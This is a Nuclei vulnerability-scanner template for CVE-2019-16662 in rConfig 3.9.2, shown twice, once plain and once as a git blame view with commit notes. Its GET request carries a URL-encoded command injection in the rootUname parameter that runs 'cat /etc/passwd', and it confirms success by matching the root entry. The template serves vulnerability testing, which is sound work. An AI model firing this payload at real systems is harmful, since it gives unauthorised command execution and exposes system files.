nuclei-templates/cves/2019/CVE-2019-16662.yaml

id: CVE-2019-16662

info:
  name: rConfig 3.9.2 - Remote Code Execution
  author: pikpikcu
  severity: critical
  reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
  tags: cve,cve2019,rce,intrusive

requests:
  - method: GET
    path:
      - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-16662`
Create CVE-2019-16662.yaml 2020-09-11 13:25:48 +00:00
			`info:`
			`name: rConfig 3.9.2 - Remote Code Execution`
			`author: pikpikcu`
			`severity: critical`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/`
			`tags: cve,cve2019,rce,intrusive`
Create CVE-2019-16662.yaml 2020-09-11 13:25:48 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`